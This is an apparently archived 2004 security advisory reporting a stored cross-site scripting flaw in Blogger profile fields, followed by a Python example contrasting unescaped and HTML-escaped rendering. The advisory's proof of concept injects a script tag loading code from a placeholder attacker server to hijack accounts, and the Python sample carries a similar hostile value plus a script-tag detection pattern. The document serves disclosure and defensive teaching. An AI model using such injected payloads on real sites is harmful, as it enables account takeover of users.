[VulnWatch] Blogger XSS Vulnerability

From: Ferruh Mavituna (ferruh_at_mavituna.com)
Date: 03/26/04

    To: <bugtraq@securityfocus.com>, <full-disclosure@lists.netsys.com>, "'Secunia'" <vuln@secunia.com>, "'Vulnwatch'" <vulnwatch@vulnwatch.org>, <webappsec@securityfocus.com>, "Windows NTBugtraq Mailing List" <NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM>
    Date: Fri, 26 Mar 2004 17:15:41 +0200

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1

    - ------------------------------------------------------
    BLOGGER XSS VULNERABILITY
    - ------------------------------------------------------
    Online URL : http://ferruh.mavituna.com/article/?470
    Severity : Moderately Critical for Members (Permanent Account
    Hijacking)

    - ------------------------------------------------------
    ABOUT BLOGGER;
    - ------------------------------------------------------
    Blogger is a web-based tool that helps you publish to the web
    instantly -- whenever the urge strikes. Blogger is the leading tool
    in the rapidly growing area of web publishing known as weblogs, or
    "blogs."

    by Google (Pyra Labs acquired by Google)

    - ------------------------------------------------------
    XSS DETAILS;
    - ------------------------------------------------------
    There is no HTML filter when rendering user profiles, so anyone can
    inject a script into a profile's "First Name", "Last Name", etc.

    If you inject code into "First Name", it will be printed and run on
    the user's first page [www.blogger.com], so an attacker can easily gain
    the victim's account.

    - ------------------------------------------------------
    Proof Of Concept;
    - ------------------------------------------------------
    Inject [script src="http://[ATTACKER-SERVER]/EVIL-JS/"][/script] into
    the victim's "First Name".
    Now you can execute anything remotely.

    After logging in as your victim:
          I. You can change the password (without the old password)
         II. You can change the e-mail address without any confirmation
        III. You can own the victim's blogs

    * Replace [ ] with < >
    * Script injection is limited to 50 characters (but that's quite
    enough to add a js script)

    - ------------------------------------------------------
    HISTORY;
    - ------------------------------------------------------
    Discovered : 2/22/2004
    Vendor Informed : 2/25/2004
    Published : 3/26/2004

    - ------------------------------------------------------
    VENDOR STATUS;
    - ------------------------------------------------------
    Contact established with Google but there is no answer.

    Ferruh Mavituna
    Web Application Security Specialist
    http://ferruh.mavituna.com
    ferruh@mavituna.com

    PGPKey : http://ferruh.mavituna.com/PGPKey.asc

    -----BEGIN PGP SIGNATURE-----
    Version: PGP 8.0.3

    iQA/AwUBQGRJDzL0QoVzo2STEQJmRwCgxUQ+ZG5yfajXvitVnJDhB9e5lY4AoNGB
    ANN10x5LT+9GahY9KvS9PURv
    =YmrO
    -----END PGP SIGNATURE-----
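The flaw the advisory describes is profile fields being written into a page without HTML encoding, with a 50-character cap as the only limit. The following is an added Python example (not part of the advisory and not Blogger's code) showing the vulnerable rendering beside its hardened form; the sample profile values, the reserved placeholder host attacker.invalid and all function names are constructed for illustration.

```python
import html
import re

# Constructed sample profile values for this example (not data from the advisory).
# "hostile" carries the kind of payload the advisory describes; attacker.invalid
# is a reserved placeholder hostname, not a real server.
SAMPLE_PROFILES = {
    "benign": {"first_name": "Ferruh", "last_name": "Mavituna"},
    "hostile": {
        "first_name": '<script src="http://attacker.invalid/x.js"></script>',
        "last_name": "Doe",
    },
}

# The advisory notes the field was capped at 50 characters; a cap is not a defence.
MAX_FIELD_LEN = 50

# Allowlist for a person's name field: a letter first, then letters, digits,
# whitespace, periods, apostrophes and hyphens. Angle brackets, quotes and
# ampersands never reach storage in the first place.
NAME_PATTERN = re.compile(r"^[^\W\d_][\w\s.'\-]*$", re.UNICODE)

SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def store_name_vulnerable(value: str) -> str:
    """Pre-fix behaviour: the only control on the way in is the 50-character cap."""
    return value[:MAX_FIELD_LEN]


def validate_name(value: str) -> str:
    """Input-side control (defence in depth): reject anything outside the allowlist."""
    value = value.strip()
    if not value or len(value) > MAX_FIELD_LEN or not NAME_PATTERN.match(value):
        raise ValueError("name contains characters outside the allowed set")
    return value


def name_is_acceptable(value: str) -> bool:
    """Boolean wrapper around validate_name for callers that just want yes/no."""
    try:
        validate_name(value)
        return True
    except ValueError:
        return False


def render_profile_unsafe(profile: dict) -> str:
    """Vulnerable rendering: stored fields are concatenated straight into HTML."""
    return f"<p>Welcome, {profile['first_name']} {profile['last_name']}!</p>"


def render_profile_safe(profile: dict) -> str:
    """Hardened rendering: every field is HTML-encoded at output time,
    regardless of what validation happened on the way in."""
    first = html.escape(profile["first_name"], quote=True)
    last = html.escape(profile["last_name"], quote=True)
    return f"<p>Welcome, {first} {last}!</p>"


def contains_script_tag(rendered_html: str) -> bool:
    """Self-check: does the rendered output still contain a live <script> tag?"""
    return SCRIPT_TAG.search(rendered_html) is not None


def demo() -> dict:
    """Run both renderers over both profiles after the 50-char cap;
    returns, per profile, whether each rendering still carries live script."""
    results = {}
    for label, profile in SAMPLE_PROFILES.items():
        truncated = {k: store_name_vulnerable(v) for k, v in profile.items()}
        results[label] = {
            "unsafe_live": contains_script_tag(render_profile_unsafe(truncated)),
            "safe_live": contains_script_tag(render_profile_safe(truncated)),
        }
    return results


if __name__ == "__main__":
    for label, r in demo().items():
        print(f"{label}: unsafe render carries script? {r['unsafe_live']}, "
              f"escaped render carries script? {r['safe_live']}")
```

Running the block shows that the truncated hostile value still opens a script tag in the unsafe renderer (the cap cuts the payload at 50 characters but leaves the opening tag intact), while the escaped renderer emits it as inert text. Output encoding at render time is the primary fix; the allowlist on write is a second layer, not a substitute, because data can enter storage through other paths.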
